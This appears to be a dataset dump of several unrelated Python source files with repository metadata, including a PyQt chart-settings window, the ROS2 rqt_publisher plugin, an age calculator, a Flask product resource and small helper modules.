def on_comboAxisY_Scale_currentIndexChanged(self,arg1):
pass
##======5.2 Y轴标题
def __setAxisY_Label(self,refreshDraw=True):
pass
@pyqtSlot(bool) ##Y 轴标题可见性
def on_groupBox_AxisYLabel_clicked(self,checked):
pass
@pyqtSlot() ##设置Y轴Label
def on_btnAxisY_setLabel_clicked(self):
self.__setAxisY_Label()
@pyqtSlot(int) ##字体大小
def on_spinAxisY_LabelFontsize_valueChanged(self,arg1):
self.__setAxisY_Label()
@pyqtSlot(bool) ##粗体
def on_chkBoxAxisY_LabelBold_clicked(self,checked):
self.__setAxisY_Label()
@pyqtSlot(bool) ##斜体
def on_chkBoxAxisY_LabelItalic_clicked(self,checked):
self.__setAxisY_Label()
@pyqtSlot()  ## text colour of the Y-axis title
def on_btnAxisY_LabelColor_clicked(self):
    """Let the user pick a colour and apply it to the Y-axis title label."""
    color = QColorDialog.getColor()  # QColor; invalid when the dialog is cancelled
    if color.isValid():
        r, g, b, a = color.getRgbF()  # getRgbF(self) -> Tuple[float, float, float, float]
        objText = self.__setAxisY_Label(False)  # NOTE(review): assumes this returns the axis-label Text object — confirm
        objText.set_color((r, g, b, a))  # text colour as an RGBA tuple of floats
        self.__fig.canvas.draw()  # refresh the canvas
##======5.3 Y轴主刻度标签
@pyqtSlot(bool) ##刻度标签可见性
def on_groupBoxAxisY_TickLabel_clicked(self,checked):
pass
@pyqtSlot() ##设置标签格式
def on_btnAxisY_TickLabFormat_clicked(self):
pass
@pyqtSlot()  ## text colour of the Y-axis tick labels
def on_btnAxisY_TickLabColor_clicked(self):
    """Pick a colour and apply it to every Y-axis tick label."""
    color = QColorDialog.getColor()
    if color.isValid():
        r, g, b, a = color.getRgbF()
        for label in self.__curAxes.yaxis.get_ticklabels():
            label.set_color((r, g, b, a))
        self.__fig.canvas.draw()  # refresh the canvas
@pyqtSlot(int)  # font size of the Y-axis tick labels
def on_spinAxisY_TickLabelFontsize_valueChanged(self, arg1):
    """Apply the spin-box value as the tick-label font size (in points)."""
    for label in self.__curAxes.yaxis.get_ticklabels():
        label.set_fontsize(arg1)
    self.__fig.canvas.draw()
@pyqtSlot(bool) ##Left axis major ticklabel
def on_chkBoxAxisY_TickLabLeft_clicked(self,checked):
pass
@pyqtSlot(bool) ##right axis major ticklabel
def on_chkBoxAxisY_TickLabRight_clicked(self,checked):
pass
##==========5.4 ===主刻度线和主网格线=====
@pyqtSlot(bool) ##显示Left主刻度线
def on_chkBoxY_majorTickLeft_clicked(self,checked):
pass
@pyqtSlot(bool) ##显示Right主刻度线
def on_chkBoxY_majorTickRight_clicked(self,checked):
pass
@pyqtSlot() ##主刻度线颜色
def on_btnLineColorY_majorTick_clicked(self):
pass
@pyqtSlot(bool) ##显示主网格线
def on_chkBoxY_majorGrid_clicked(self,checked):
pass
@pyqtSlot() ##主网格线颜色
def on_btnLineColorY_majorGrid_clicked(self):
pass
@pyqtSlot(str) ##主网格线样式
def on_comboLineStyle_YmajorGrid_currentIndexChanged(self,arg1):
pass
##==========5.5 ===次刻度线和次网格线=====
@pyqtSlot(bool) ##显示Left次刻度线
def on_chkBoxY_minorTickLeft_clicked(self,checked):
pass
@pyqtSlot(bool) ##显示Right次刻度线
def on_chkBoxY_minorTickRight_clicked(self,checked):
pass
@pyqtSlot() ##次刻度线颜色
def on_btnLineColorY_minorTick_clicked(self):
pass
@pyqtSlot(bool) ##显示次网格线
def on_chkBoxY_minorGrid_clicked(self,checked):
pass
@pyqtSlot() ##次网格线颜色
def on_btnLineColorY_minorGrid_clicked(self):
pass
@pyqtSlot(str) ##次网格线样式
def on_comboLineStyle_YminorGrid_currentIndexChanged(self,arg1):
pass
## =============自定义槽函数===============================
@pyqtSlot(int)
def do_currentAxesChaned(self,index): #当前子图切换
pass
## ============窗体测试程序 ================================
## ============ standalone window test program ================================
if __name__ == "__main__":  # used only when testing this window directly
    app = QApplication(sys.argv)  # create the GUI application
    form = QmyMainWindow()        # create the main window
    form.show()
    sys.exit(app.exec_())
| [
"316790607@qq.com"
] | 316790607@qq.com |
9d7e53e4f1b89ea971dd1e49f599e7919a008497 | 4bab98acf65c4625a8b3c757327a8a386f90dd32 | /ros2-windows/Lib/site-packages/rqt_publisher/publisher.py | ecccbf727b1edfdae4f1dbb37ffd5136f5f52b43 | [] | no_license | maojoejoe/Peach-Thinning-GTRI-Agricultural-Robotics-VIP | e2afb08b8d7b3ac075e071e063229f76b25f883a | 8ed707edb72692698f270317113eb215b57ae9f9 | refs/heads/master | 2023-01-15T06:00:22.844468 | 2020-11-25T04:16:15 | 2020-11-25T04:16:15 | 289,108,482 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,547 | py | #!/usr/bin/env python
# Copyright (c) 2011, Dorian Scholz, TU Darmstadt
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the TU Darmstadt nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import division
import array
import math
import random
import time
from python_qt_binding.QtCore import Slot, QSignalMapper, QTimer, qWarning
from rclpy.exceptions import InvalidTopicNameException
from rclpy.qos import QoSProfile
from rqt_gui_py.plugin import Plugin
from .publisher_widget import PublisherWidget
from rqt_py_common.message_helpers import get_message_class
from rqt_py_common.topic_helpers import get_slot_type
# Sequence types accepted when matching user expressions to array-like
# message slots; numpy's ndarray is included only if numpy is installed.
_list_types = [list, tuple, array.array]
try:
    import numpy
    _list_types.append(numpy.ndarray)
except ImportError:
    pass

# Scalar numeric types accepted for numeric message slots.
_numeric_types = [int, float]
try:
    import numpy
    # numpy scalar types are optional extras; numpy.float128 does not exist
    # on every platform (e.g. Windows builds), so probe each name instead of
    # letting an AttributeError escape the ImportError-only handler.
    for _numpy_type_name in ('int8', 'int16', 'int32', 'int64',
                             'float16', 'float32', 'float64', 'float128'):
        if hasattr(numpy, _numpy_type_name):
            _numeric_types.append(getattr(numpy, _numpy_type_name))
except ImportError:
    pass
class Publisher(Plugin):
def __init__(self, context):
super(Publisher, self).__init__(context)
self.setObjectName('Publisher')
self._node = context.node
# create widget
self._widget = PublisherWidget(self._node)
self._widget.add_publisher.connect(self.add_publisher)
self._widget.change_publisher.connect(self.change_publisher)
self._widget.publish_once.connect(self.publish_once)
self._widget.remove_publisher.connect(self.remove_publisher)
self._widget.clean_up_publishers.connect(self.clean_up_publishers)
if context.serial_number() > 1:
self._widget.setWindowTitle(
self._widget.windowTitle() + (' (%d)' % context.serial_number()))
# create context for the expression eval statement
self._eval_locals = {'i': 0}
for module in (math, random, time):
self._eval_locals.update(module.__dict__)
del self._eval_locals['__name__']
del self._eval_locals['__doc__']
self._publishers = {}
self._id_counter = 0
self._timeout_mapper = QSignalMapper(self)
self._timeout_mapper.mapped[int].connect(self.publish_once)
# add our self to the main window
context.add_widget(self._widget)
@Slot(str, str, float, bool)
def add_publisher(self, topic_name, type_name, rate, enabled):
topic_name = str(topic_name)
try:
self._node._validate_topic_or_service_name(topic_name)
except InvalidTopicNameException as e:
qWarning(str(e))
return
publisher_info = {
'topic_name': topic_name,
'type_name': str(type_name),
'rate': float(rate),
'enabled': bool(enabled),
}
self._add_publisher(publisher_info)
def _add_publisher(self, publisher_info):
publisher_info['publisher_id'] = self._id_counter
self._id_counter += 1
publisher_info['counter'] = 0
publisher_info['enabled'] = publisher_info.get('enabled', False)
publisher_info['expressions'] = publisher_info.get('expressions', {})
publisher_info['message_instance'] = self._create_message_instance(
publisher_info['type_name'])
if publisher_info['message_instance'] is None:
return
msg_module = get_message_class(publisher_info['type_name'])
if not msg_module:
raise RuntimeError(
'The passed message type "{}" is invalid'.format(publisher_info['type_name']))
# Topic name provided was relative, remap to node namespace (if it was set)
if not publisher_info['topic_name'].startswith('/'):
publisher_info['topic_name'] = \
self._node.get_namespace() + publisher_info['topic_name']
# create publisher and timer
publisher_info['publisher'] = self._node.create_publisher(
msg_module, publisher_info['topic_name'], qos_profile=QoSProfile(depth=10))
publisher_info['timer'] = QTimer(self)
# add publisher info to _publishers dict and create signal mapping
self._publishers[publisher_info['publisher_id']] = publisher_info
self._timeout_mapper.setMapping(publisher_info['timer'], publisher_info['publisher_id'])
publisher_info['timer'].timeout.connect(self._timeout_mapper.map)
if publisher_info['enabled'] and publisher_info['rate'] > 0:
publisher_info['timer'].start(int(1000.0 / publisher_info['rate']))
self._widget.publisher_tree_widget.model().add_publisher(publisher_info)
@Slot(int, str, str, str, object)
def change_publisher(self, publisher_id, topic_name, column_name, new_value, setter_callback):
handler = getattr(self, '_change_publisher_%s' % column_name, None)
if handler is not None:
new_text = handler(self._publishers[publisher_id], topic_name, new_value)
if new_text is not None:
setter_callback(new_text)
def _change_publisher_topic(self, publisher_info, topic_name, new_value):
publisher_info['enabled'] = (new_value and new_value.lower() in ['1', 'true', 'yes'])
# qDebug(
# 'Publisher._change_publisher_enabled(): %s enabled: %s' %
# (publisher_info['topic_name'], publisher_info['enabled']))
if publisher_info['enabled'] and publisher_info['rate'] > 0:
publisher_info['timer'].start(int(1000.0 / publisher_info['rate']))
else:
publisher_info['timer'].stop()
return None
def _change_publisher_type(self, publisher_info, topic_name, new_value):
type_name = new_value
# create new slot
slot_value = self._create_message_instance(type_name)
# find parent slot
slot_path = topic_name[len(publisher_info['topic_name']):].strip('/').split('/')
parent_slot = eval('.'.join(["publisher_info['message_instance']"] + slot_path[:-1]))
# find old slot
slot_name = slot_path[-1]
slot_index = parent_slot.__slots__.index(slot_name)
# restore type if user value was invalid
if slot_value is None:
qWarning('Publisher._change_publisher_type(): could not find type: %s' % (type_name))
return parent_slot._slot_types[slot_index]
else:
# replace old slot
parent_slot._slot_types[slot_index] = type_name
setattr(parent_slot, slot_name, slot_value)
self._widget.publisher_tree_widget.model().update_publisher(publisher_info)
def _change_publisher_rate(self, publisher_info, topic_name, new_value):
try:
rate = float(new_value)
except Exception:
qWarning('Publisher._change_publisher_rate(): could not parse rate value: %s' %
(new_value))
else:
publisher_info['rate'] = rate
# qDebug(
# 'Publisher._change_publisher_rate(): %s rate changed: %fHz' %
# (publisher_info['topic_name'], publisher_info['rate']))
publisher_info['timer'].stop()
if publisher_info['enabled'] and publisher_info['rate'] > 0:
publisher_info['timer'].start(int(1000.0 / publisher_info['rate']))
# make sure the column value reflects the actual rate
return '%.2f' % publisher_info['rate']
def _change_publisher_expression(self, publisher_info, topic_name, new_value):
expression = str(new_value)
if len(expression) == 0:
if topic_name in publisher_info['expressions']:
del publisher_info['expressions'][topic_name]
# qDebug(
# 'Publisher._change_publisher_expression(): removed expression'
# 'for: %s' % (topic_name))
else:
# Strip topic name from the full topic path
slot_path = topic_name.replace(publisher_info['topic_name'], '', 1)
slot_path, slot_array_index = self._extract_array_info(slot_path)
# Get the property type from the message class
slot_type, is_array = \
get_slot_type(publisher_info['message_instance'].__class__, slot_path)
if slot_array_index is not None:
is_array = False
if is_array:
slot_type = list
# strip possible trailing error message from expression
error_prefix = '# error'
error_prefix_pos = expression.find(error_prefix)
if error_prefix_pos >= 0:
expression = expression[:error_prefix_pos]
success, _ = self._evaluate_expression(expression, slot_type)
if success:
old_expression = publisher_info['expressions'].get(topic_name, None)
publisher_info['expressions'][topic_name] = expression
try:
self._fill_message_slots(
publisher_info['message_instance'], publisher_info['topic_name'],
publisher_info['expressions'], publisher_info['counter'])
except Exception as e:
if old_expression is not None:
publisher_info['expressions'][topic_name] = old_expression
else:
del publisher_info['expressions'][topic_name]
return '%s %s: %s' % (expression, error_prefix, e)
return expression
else:
return '%s %s evaluating as "%s"' % (
expression, error_prefix, slot_type.__name__)
def _extract_array_info(self, type_str):
    """Split a type string such as 'pkg/Msg[5]' into ('pkg/Msg', 5).

    Returns (type_str, None) for a plain (non-array) type, and an
    array size of 0 for an unbounded array written as 'pkg/Msg[]'.
    """
    size = None
    if '[' in type_str and type_str.endswith(']'):
        base, _, size_text = type_str.partition('[')
        size_text = size_text[:-1]  # drop the trailing ']'
        size = int(size_text) if size_text else 0
        return base, size
    return type_str, size
def _create_message_instance(self, type_str):
    """Instantiate an empty message (or list of messages) for `type_str`.

    `type_str` may carry an array suffix, e.g. 'std_msgs/msg/Int32[5]'.
    Returns None when the message class cannot be resolved.
    """
    base_type_str, array_size = self._extract_array_info(type_str)
    try:
        base_message_type = get_message_class(base_type_str)
    except LookupError as e:
        qWarning("Creating message type {} failed. Please check your spelling and that the "
                 "message package has been built\n{}".format(base_type_str, e))
        return None
    if base_message_type is None:
        return None
    if array_size is not None:
        # Array type: pre-populate with default-constructed messages
        # (an unbounded array, size 0, yields an empty list).
        message = []
        for _ in range(array_size):
            message.append(base_message_type())
    else:
        message = base_message_type()
    return message
def _evaluate_expression(self, expression, slot_type):
    """Evaluate a user-supplied Python expression for a message slot.

    Returns (True, value) with `value` coerced to `slot_type` on success,
    otherwise (False, None). For string slots a failed eval falls back to
    the literal expression text.
    """
    global _list_types
    global _numeric_types
    successful_eval = True
    try:
        # try to evaluate expression
        # SECURITY NOTE: eval of user input is intentional here — this is the
        # rqt GUI feature that lets users type expressions; input comes from
        # the local operator, not the network.
        value = eval(expression, {}, self._eval_locals)
    except Exception as e:
        qWarning('Python eval failed for expression "{}"'.format(expression) +
                 ' with an exception "{}"'.format(e))
        successful_eval = False
    if slot_type is str:
        if successful_eval:
            value = str(value)
        else:
            # for string slots just convert the expression to str, if it did not
            # evaluate successfully
            value = str(expression)
            successful_eval = True
    elif successful_eval:
        type_set = set((slot_type, type(value)))
        # check if value's type and slot_type belong to the same type group, i.e. array types,
        # numeric types and if they do, make sure values's type is converted to the exact
        # slot_type
        if type_set <= set(_list_types) or type_set <= set(_numeric_types):
            # convert to the right type
            value = slot_type(value)
    if successful_eval and isinstance(value, slot_type):
        return True, value
    else:
        qWarning('Publisher._evaluate_expression(): failed to evaluate ' +
                 'expression: "%s" as Python type "%s"' % (
                     expression, slot_type))
        return False, None
def _fill_message_slots(self, message, topic_name, expressions, counter):
    """Recursively evaluate stored expressions into `message`'s slots.

    Returns a replacement value when this slot had an expression (the
    caller assigns it), or None when children were filled in place or
    nothing applied. `counter` is exposed to expressions as variable `i`.
    """
    global _list_types
    if topic_name in expressions and len(expressions[topic_name]) > 0:
        # get type of this slot so the expression result can be coerced
        if hasattr(message, '_type'):
            message_type = message._type
        else:
            message_type = type(message)
        self._eval_locals['i'] = counter
        success, value = self._evaluate_expression(expressions[topic_name], message_type)
        if not success:
            # fall back to a default-constructed value on eval failure
            value = message_type()
        return value
    # if no expression exists for this topic_name, continue with it's child slots
    elif hasattr(message, 'get_fields_and_field_types'):
        for slot_name in message.get_fields_and_field_types().keys():
            value = self._fill_message_slots(
                getattr(message, slot_name),
                topic_name + '/' + slot_name, expressions, counter)
            if value is not None:
                setattr(message, slot_name, value)
    elif type(message) in _list_types and (len(message) > 0):
        for index, slot in enumerate(message):
            value = self._fill_message_slots(
                slot, topic_name + '[%d]' % index, expressions, counter)
            # this deals with primitive-type arrays
            if not hasattr(message[0], '__slots__') and value is not None:
                message[index] = value
    return None
@Slot(int)
def publish_once(self, publisher_id):
    """Publish one message for `publisher_id` (also the timer callback).

    Increments the counter, re-evaluates all slot expressions with it,
    then publishes. Unknown ids are silently ignored.
    """
    publisher_info = self._publishers.get(publisher_id, None)
    if publisher_info is not None:
        publisher_info['counter'] += 1
        self._fill_message_slots(
            publisher_info['message_instance'],
            publisher_info['topic_name'],
            publisher_info['expressions'],
            publisher_info['counter'])
        publisher_info['publisher'].publish(publisher_info['message_instance'])
@Slot(int)
def remove_publisher(self, publisher_id):
publisher_info = self._publishers.get(publisher_id, None)
if publisher_info is not None:
publisher_info['timer'].stop()
self._node.destroy_publisher(publisher_info['publisher'])
del publisher_info['publisher']
del self._publishers[publisher_id]
def save_settings(self, plugin_settings, instance_settings):
publisher_copies = []
for publisher in self._publishers.values():
publisher_copy = {}
publisher_copy.update(publisher)
publisher_copy['enabled'] = False
del publisher_copy['timer']
del publisher_copy['message_instance']
del publisher_copy['publisher']
publisher_copies.append(publisher_copy)
instance_settings.set_value('publishers', repr(publisher_copies))
def restore_settings(self, plugin_settings, instance_settings):
# If changing perspectives and rqt_publisher is already loaded, we need to clean up the
# previously existing publishers
self.clean_up_publishers()
publishers = eval(instance_settings.value('publishers', '[]'))
for publisher in publishers:
self._add_publisher(publisher)
def clean_up_publishers(self):
self._widget.publisher_tree_widget.model().clear()
for publisher_info in self._publishers.values():
publisher_info['timer'].stop()
self._node.destroy_publisher(publisher_info['publisher'])
self._publishers = {}
def shutdown_plugin(self):
self._widget.shutdown_plugin()
self.clean_up_publishers()
| [
"aidencfarrar@gmail.com"
] | aidencfarrar@gmail.com |
66bb9bb7d3369de9b8f56dc1430be5a5e4df12de | 79ce28667bb9a954e2d9292d7c80d7a6fbd68c2a | /python lab/python/AgeConvert.py | 4ad0cc1bff8c169204d09ec66049e3c03f7da747 | [] | no_license | AshayFernandes/PythonPrograms | c1084af9e821aa9d6f992dff4f7491de78069cad | 80f67700a0cd2ef247d8d02ed3531296a48c2faa | refs/heads/master | 2021-06-25T04:46:56.447271 | 2021-04-05T17:20:21 | 2021-04-05T17:20:21 | 206,642,263 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,017 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Nov 12 11:17:13 2019
@author: Ashay Fernandes
"""
from datetime import date
def AgeConvert(value, today=None):
    """Return a calendar-accurate age as [years, months, days].

    Replaces the previous approximate arithmetic (365.25 days/year,
    30.5 days/month with sign-handling bugs and debug prints) with exact
    date borrowing.

    Parameters
    ----------
    value : str
        Date of birth in 'YEAR-MONTH-DAY' (ISO) format, e.g. '1995-11-12'.
    today : datetime.date, optional
        Reference date for the calculation; defaults to the current date.
        Exposed as a parameter so the function is deterministic/testable.

    Returns
    -------
    list
        [years, months, days] elapsed between the birth date and `today`.
    """
    from datetime import timedelta  # local import: module only imports `date` at the top

    if today is None:
        today = date.today()
    year, month, day = (int(part) for part in value.split('-'))
    born = date(year, month, day)

    years = today.year - born.year
    months = today.month - born.month
    days = today.day - born.day
    if days < 0:
        # Borrow one month: measure days from the most recent monthly
        # "birthday" (clamped to the previous month's length).
        months -= 1
        last_of_prev = today.replace(day=1) - timedelta(days=1)
        anchor = last_of_prev.replace(day=min(born.day, last_of_prev.day))
        days = (today - anchor).days
    if months < 0:
        # Borrow one year.
        years -= 1
        months += 12
    return [years, months, days]
# Script entry point: read a birth date from stdin and report the age.
age = AgeConvert(input("enter your DOB in YEAR-MONTH-DAY format"))
print('your age is{0[0]} years {0[1]} month {0[2]} days'.format(age))
| [
"noreply@github.com"
] | AshayFernandes.noreply@github.com |
06f57a28cdaadfb1292a76ea642bacf76068664b | 8f33f62d1787980b55a6334cebb51dde54a007f5 | /Semana8/libreria/controllers/producto.py | 0eae5c271772c9aab5923a0fc8df12ee0547360d | [
"MIT"
] | permissive | GuidoTorres/codigo8 | 012a280cbc1f90415c280c29c5cdff51d42f4508 | 7fdff4f677f048de7d7877b96ec3a688d3dde163 | refs/heads/master | 2023-01-11T02:57:35.487104 | 2019-12-10T18:04:13 | 2019-12-10T18:04:13 | 214,514,926 | 0 | 0 | MIT | 2023-01-07T17:48:31 | 2019-10-11T19:32:40 | JavaScript | UTF-8 | Python | false | false | 1,306 | py | from flask_restful import Resource, reqparse
from libreria.models.producto import ProductoModel
class Producto(Resource):
parser = reqparse.RequestParser()
parser.add_argument(
'nombre_producto',
type= str,
required = True,
help = "Falta el nombre_producto"
)
parser.add_argument(
'categoria',
type= str,
required = True,
help = "Falta categoria"
)
def get(self, nombre):
# Selefc * from producto where desc = nombre
# Query.fetchone()
producto = ProductoModel.query.filter_by(desc = nombre).first()
if producto:
return producto.devolverjson()
return {'message' : 'No existe el producto'}, 404
def post(self):
data = Producto.parser.parse_args()
producto = ProductoModel(data['nombre_producto'],data['categoria'])
try:
producto.guardar_en_bd()
except:
return{'message': 'Hubo un error al guardar en la base de datos'}, 500
return {'message': 'Se guardo el producto exitosamente', 'producto' : data['nombre_producto']}
return {'message': 'Se guardo la categoria exitosamente', 'categoria' : data['categoria']} | [
"migueldavid006@hotmail.com"
] | migueldavid006@hotmail.com |
81c774274ea1985459331e361032ea18dcb3b101 | a9fc477af17bd3aee3b59a228094e5a7ccf9c5e2 | /appform/choices.py | 717df9a1e1baa183586147f99fb374bcc7f1e9b1 | [] | no_license | mjtco-iscteiul/ESII-Progress | eb7acc2f90f3c288375433b153346fffc45a0c6c | 01d572e7266d8609acec90588b82d00b2d67a835 | refs/heads/master | 2021-01-25T14:40:25.869411 | 2018-03-13T18:14:42 | 2018-03-13T18:14:42 | 123,722,780 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 74 | py | type_choices=(
('Int', 'Int'),
('Db', 'Doub'),
('Bl', 'Bl')
)
| [
"mjtco@iscte-iul.pt"
] | mjtco@iscte-iul.pt |
0a6e9cc728f84ccf104a9a9a2f458f088fbc48e7 | c600ee683d0ecb4a2f17c76a174d60c0c61891f6 | /Speaker_And_Audience_activity_classification/Mfcc_Extraction.py | fd7de918c62559818faa4b3f5dee7407786882e5 | [] | no_license | sandepp123/Freelance-Project | db875d57e5f2c350352f6bbb988ae552b474c5e5 | 250940dbf504f836b2650c63644a630bb9aed2a6 | refs/heads/master | 2021-01-11T17:28:42.072155 | 2017-01-23T08:14:39 | 2017-01-23T08:14:39 | 79,781,063 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,938 | py | from Preprocessing import list_files
from scikits.talkbox.features import mfcc
import scipy
import librosa
import essentia, essentia.standard as ess
import pandas as pd
import numpy as np
#### MFCC Using Librosa Library *********not used****************** #####
#### MFCC Using Librosa Library #####
def Extract_MFCC_Librosa(path, number_of_Mfcc=20, name="MFCC_Librosa_.csv"):
    """Compute MFCCs for every .wav file under `path` using librosa.

    Fixes two defects of the original: the MFCC matrices were computed and
    then discarded (nothing was returned), and `number_of_Mfcc` was never
    used (librosa's default n_mfcc is 20, matching this default).

    Returns a list of (filename, mfcc_matrix) pairs.
    NOTE(review): `name` is still unused here — the original never wrote a
    CSV from this function; kept for interface compatibility.
    """
    files = list_files(path, ".wav")
    results = []
    for file in files:
        x, fs = librosa.load(path + "/" + file)
        mfccs = librosa.feature.mfcc(x, sr=fs, n_mfcc=number_of_Mfcc)
        results.append((file, mfccs))
    return results
#### MFCC Using Scikit Talkbox Library #####
#### MFCC Using Scikit Talkbox Library #####
def Extract_MFCC_TalkBox(path, number_of_Mfcc=13, name="MFCC_Talk_Box.csv"):
    """Extract per-file mean MFCC vectors with scikits.talkbox and save a CSV.

    For each .wav file the MFCC frames are averaged over the middle 80% of
    frames (trimming 10% at each end) to get one feature row per file; the
    rows plus filenames are written to `path/name`.

    Returns the (features, filename) matrix that was written.
    """
    # Bug fix: `import scipy` at module level does NOT load the
    # scipy.io.wavfile submodule; import it explicitly here.
    import scipy.io.wavfile

    files = list_files(path, ".wav")
    ci = 0  # processed-file counter, used only for progress output
    X, y = [], []
    for file in files:
        sample_rate, X1 = scipy.io.wavfile.read(path + "/" + file)  # read wav samples
        ceps, mspec, spec = mfcc(X1)  # ceps contains the MFCC frames
        num_ceps = len(ceps)  # e.g. (100, 13) -> 100 frames
        # Column-wise mean over the central 80% of frames: one vector per file.
        X.append(np.mean(ceps[int(num_ceps * 0.1):int(num_ceps * 0.9)], axis=0))
        y.append(file)
        print("%d %s" % (ci, file))  # 2/3-compatible progress print
        ci += 1
    c = np.column_stack([X, y])  # append the filename to each feature row
    np.savetxt(path + '/' + name, c, delimiter=',', fmt='%s')  # save in the dataset folder
    return c
#MFCC using Essentia*********not used******************
# MFCC using Essentia
def Extract_Mfcc_Essetia(path):
    """Compute 13 MFCC coefficients per frame for every .wav under `path`
    using Essentia (Hamming window, 1024-sample frames, 500-sample hop).

    Fixes a NameError in the original: the module is imported as `np`,
    but `numpy.array` was referenced. Also collects and returns the
    results instead of only printing shapes.
    """
    hamming_window = ess.Windowing(type='hamming')
    spectrum = ess.Spectrum()
    mfcc_extractor = essentia.standard.MFCC(numberCoefficients=13)
    frame_sz = 1024
    hop_sz = 500
    files = list_files(path, ".wav")
    results = []
    for file in files:
        x, fs = librosa.load(path + "/" + file)
        mfccs = np.array([  # bug fix: was `numpy.array` with no `numpy` in scope
            mfcc_extractor(spectrum(hamming_window(frame)))[1]
            for frame in essentia.standard.FrameGenerator(
                x, frameSize=frame_sz, hopSize=hop_sz)
        ])
        print("%s  %s" % (mfccs.shape, file))  # 2/3-compatible progress print
        results.append((file, mfccs))
    return results
| [
"sandeep.pyc@gmail.com"
] | sandeep.pyc@gmail.com |
f36c0257d7334f35efab0927376708780699018b | d9383f0a8745c687e313c5182b1e035874d3ebad | /data_visualization_with_plotly/company_headcount/retrieve_company_data.py | 46da2537311d23d9e1be10e46cef1bb2c49a6994 | [] | no_license | madeleinema-cee/interview_coding_challenges | 336a1e4a55bca0ac852e7e56916bc6fa286c3c1a | 90b9184ded83e7425aaa9f2635fb25a192e8ded8 | refs/heads/main | 2023-04-14T19:36:45.489963 | 2021-05-03T17:32:05 | 2021-05-03T17:32:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,287 | py | from helpers.db import Db
class RetrieveCompanyData:
"""Contains all the functions to retrieve the data for
the django project
Attributes:
db (Db): headcount Db instance
query (str): query instance
"""
def __init__(self):
self.db = Db('company_headcount/headcount.db')
self.query = None
def main(self):
"""Method to call function sequentially
Returns:
self.parse_months(data) (arr): an array of months return by self.parse_months function
self.parse_company_data(data)(dict): an dict of companies and their monthly headcounts
returned by self.parse_company_data function
"""
data = self.retrieve_data()
return self.parse_months(data), self.parse_company_data(data)
def retrieve_data(self):
"""Retrieves company data to be preserved
Returns:
company data
"""
self.query = """
select c.company, h.month, h.headcount from headcount h
join company_headcount ch on ch.headcount_id = h.id
join company c on ch.company_id = c.id"""
results = self.db.fetchall(self.query)
return results
def parse_months(self, data):
"""Parse company data
Arguments:
data (arr): a array of dictionaries
Returns:
months data
"""
months = []
for row in data:
if row['month'] not in months:
months.append(row['month'])
return months
def parse_company_data(self, data):
"""Parse company data
Arguments:
data (arr): a array of dictionaries
Returns:
company and headcount data
"""
company_data = {}
for row in data:
company = row['company'].capitalize()
if company not in company_data:
company_data[company] = {
'headcount': [row['headcount']]
}
else:
if row['headcount'] not in company_data[company]['headcount']:
company_data[company]['headcount'].append(row['headcount'])
return company_data
| [
"noreply@github.com"
] | madeleinema-cee.noreply@github.com |
259f7b4331ec5008e4fe49e7e52a81a05c05e297 | 2d5815d3086fdd6379f879e13690506e415df318 | /GSApy/gsaerr.py | ab3aa2c19458af8cc1196119c37b65a9f9734b00 | [] | no_license | tonnerrek/MagelLANic-Cloud | 65e94c855e388ab84109cd58a3964361dbcfcc12 | be38a12ca94c7a06e57b256fff1cbd3f103908f2 | refs/heads/master | 2021-01-11T20:09:50.567156 | 2017-01-23T19:24:07 | 2017-01-23T19:24:07 | 79,054,867 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,216 | py | #!/usr/bin/env python
from sys import exit
class MSGColor:
#only for 16color terminals
map = {'black': '0m', 'red': '1m', 'green': '2m', 'yellow': '3m',
'blue': '4m', 'magenta': '5m', 'cyan': '6m', 'gray': '7m'}
bold = '1;'
lit = '9'
dim = '3'
clr = '\33[0m'
def msgCLR(colorid, txt, enlight=0, bold=0):
stx = '\33['
if bold != 0:
stx += MSGColor.bold
if enlight == 0:
stx += MSGColor.lit+MSGColor.map[str(colorid)]
else:
stx += MSGColor.dim+MSGColor.map[str(colorid)]
return stx+txt+MSGColor.clr
def errMSG(header, message, type='STD_ERR', var=''):
if type not in ('STD_ERR', 'VAR_ERR', 'STD_WRN'): raise ValueError("Bad message type in function errmsg ("+__name__+".py)")
if type == 'STD_ERR':
print msgCLR('red', "[ "+str(header)+" ] ", 1) + msgCLR('black', str(message))
if type == 'VAR_ERR':
print msgCLR('red', "[ "+str(header)+" ] ", 1) + msgCLR('black', str(message)) + msgCLR('yellow', str(var))
if type == 'STD_WRN':
print msgCLR('yellow', "[ "+str(header)+" ] ", 1) + msgCLR('black', str(message))
return
exit()
if __name__ == '__main__':
print msgCLR('red', "!THIS IS NOT STANDALONE SCRIPT!", 1)
| [
"m.zukey@gmail.com"
] | m.zukey@gmail.com |
